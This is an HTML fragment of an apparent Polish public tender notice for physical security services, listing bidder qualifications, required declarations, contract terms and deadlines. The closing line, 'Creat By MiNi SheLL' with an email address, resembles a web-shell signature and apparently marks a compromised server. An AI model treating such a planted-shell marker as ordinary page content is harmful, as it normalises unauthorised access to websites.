dysponowaniem odpowiednią liczbą osób potrzebną do realizacji usługi, które posiadają niezbędne kwalifikacje potwierdzone odpowiednimi uprawnieniami w zakresie wykonywania czynności ochrony fizycznej obiektów, osób i mienia - osoby wpisane na listę kwalifikowanych pracowników ochrony fizycznej, posiadających ukończony kurs kwalifikowanej pierwszej pomocy oraz wiedzę w zakresie prawidłowej obsługi centrali przeciwpożarowej. Muszą być to osoby niekarane, legitymujące się min. 2 letnim stażem pracy na stanowisku pracownika ochrony. Jedna z osób winna być również wpisana na listę kwalifikowanych pracowników zabezpieczenia technicznego. <br/>3.	Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego sytuacji technicznej lub zawodowej dopuszcza łączne spełnienie warunków przez wykonawców.<br/>4.	Zamawiający wymaga aby Wykonawca złożył ofertę zgodną z wymaganiami określonymi w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie<br/>Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 369), z innym wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik<br/>nr 6 do SWZ.<br/>2) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniach stanowiących Załącznik Nr 4 i 5 do SWZ –<br/>zgodnie z Załącznik Nr 8 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 6 do SWZ.<br/>2)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniach stanowiących Załącznik Nr 4 i 5 do SWZ – zgodnie z Załącznik Nr 8 do SWZ; <br/>3)	Załącznik Nr 9 do SWZ, stanowiącego wykaz wykonanych usług wraz z dokumentami lub kserokopiami dokumentów potwierdzonych za zgodność z oryginałem przez upoważnioną do tego osobę, potwierdzających prawidłowe wykonanie wszystkich usług wykazanych w Załączniku Nr 9 do SWZ w postaci np.: referencji bądź innych dokumentów wystawionych przez podmiot na rzecz, którego była realizowana usługa zawierające dokładne wskazania wartości, przedmiotu, dat realizacji i dokładnych danych podmiotu, na rzecz, którego realizowana była usługa zrealizowanej lub realizowanej umowy. W przypadku umów, które są realizowane w okresie prowadzonego postępowania dokument potwierdzający realizację nie może być wydany wcześniej niż na 3 miesiące przed jego złożeniem.<br/>4)	Koncesję lub kserokopię Koncesji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia zgodnie z Ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2021 r. poz. 1995 z późn. zm.)<br/>5)	Dokumenty lub kserokopię dokumentów potwierdzających ubezpieczenie od OC w zakresie prowadzonej działalności tożsamej z przedmiotem zamówienia na sumę nie mniejszą niż 300 000,00 zł przez cały okres realizacji usługi.<br/>6)	Załącznik Nr 10 do SWZ stanowiący wykaz osób uczestniczących w wykonaniu usługi spełniających warunek pracowników wpisanych na listę kwalifikowanych pracowników ochrony fizycznej zgodnie z ustawą z 22 sierpnia 1997 r. o ochronie osób i mienia i kwalifikowanego pracownika zabezpieczenia technicznego, w przypadku zmian wykazanych osób Wykonawca każdorazowo musi poinformować o zaistniałej zmianie Zamawiającego na piśmie wraz z dostarczeniem aktualnych dokumentów.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w<br/>Rozdziale VIII ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie z uwzględnieniem<br/>postanowień wynikających z treści niniejszej specyfikacji warunków zamówienia oraz danych zawartych w ofercie.<br/>2. Postanowienia umowy zawarto w projektowanych postanowieniach umowy stanowiących Załącznik Nr 3 do SWZ.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454 – 455 ustawy Pzp oraz wskazanym w projektowanych postanowieniach umowy stanowiących<br/>Załącznik Nr 3 do SWZ.<br/>4. Wzór umowy zawiera zmiany dotyczące zmiany podatku oraz klauzule waloryzacyjne.<br/>5. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-22 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com